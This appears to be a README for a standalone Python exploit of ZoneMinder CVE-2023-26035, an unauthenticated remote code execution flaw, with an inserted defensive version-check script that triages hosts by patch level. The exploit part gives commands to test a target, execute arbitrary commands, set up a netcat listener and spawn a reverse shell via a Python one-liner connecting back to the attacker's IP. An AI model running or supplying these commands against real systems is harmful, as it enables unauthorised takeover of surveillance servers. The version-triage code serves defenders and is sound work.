## https://sploitus.com/exploit?id=2BF189F3-8F76-5543-B4CD-591DC1EEDDD4
# Exploit - ZoneMinder CVE-2023-26035
There is an **Unauthenticated Remote Code Execution (RCE)** vulnerability affecting **ZoneMinder** Snapshots.
This is an **exploit** for CVE-2023-26035.
## Affected versions
ZoneMinder **< 1.36.33** and
ZoneMinder **< 1.37.33**.
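
For defenders triaging an inventory against the bounds above, here is a version check (an added example, not part of the exploit script or the ZoneMinder project). It assumes the two bounds apply per release branch, with 1.36.33 fixing the 1.36.x line and 1.37.33 fixing the 1.37.x line, and that releases older than 1.36 count as affected; hostnames and versions in the sample are constructed.

```python
import re

# Fixed releases, taken from the "Affected versions" section above.
FIXED_1_36 = (1, 36, 33)
FIXED_1_37 = (1, 37, 33)

# Accept an optional "v" prefix and ignore packaging suffixes such as "~focal1".
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return (major, minor, patch), or None if no x.y.z prefix is present."""
    m = _VERSION_RE.match(text.strip())
    return tuple(int(p) for p in m.groups()) if m else None


def is_affected(version_text):
    """True if affected, False if fixed, None if the string cannot be parsed."""
    v = parse_version(version_text)
    if v is None:
        return None
    if v[:2] == (1, 37):
        # Assumption: 1.37.x is its own branch with its own fixed release.
        return v < FIXED_1_37
    # 1.36.x and anything older (assumption) is compared to the 1.36 fix.
    return v < FIXED_1_36


def triage(inventory):
    """Map host -> 'affected' | 'fixed' | 'unknown' for a host->version dict."""
    labels = {True: "affected", False: "fixed", None: "unknown"}
    return {host: labels[is_affected(ver)] for host, ver in inventory.items()}


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE = {
    "cam-nvr-01": "1.36.32",
    "cam-nvr-02": "1.36.33",
    "cam-nvr-03": "v1.37.20",
    "cam-nvr-04": "1.36.35~focal1",
    "cam-nvr-05": "1.34.26",
    "cam-nvr-06": "unknown build",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE).items():
        print(f"{host}: {status}")
```

Hosts reported as `unknown` need a manual check, since an unparseable version string says nothing about patch level.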
![Usage of the exploit](./demo.png)
## Usage
#### Check if the target is vulnerable:
```
python3 zoneminder.py http://target
```
#### Execute a command
```
python3 zoneminder.py http://target command
```
## Examples
#### Test command execution with `ping`
Run `tcpdump` on the interface connected to the target (here `tun0`) and filter for `ICMP` packets:
```
sudo tcpdump -i tun0 icmp
```
Then execute a ping to your IP. Make sure to use quotes `"` as otherwise the command won't be interpreted correctly.
```
python3 zoneminder.py http://target "ping -c 4 your_ip"
```
#### Reverse shell
Create the listener with netcat:
```
nc -lvnp 1337
```
Use a reverse shell oneliner:
```
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
```
More at https://revshells.com.
## Requirements
The exploit makes use of **`requests`** and **`BeautifulSoup`**.
Install them with:
```
python3 -m pip install requests beautifulsoup4
```
## Acknowledgements
I just wanted a standalone exploit that didn't require Metasploit.
The script is derived from https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr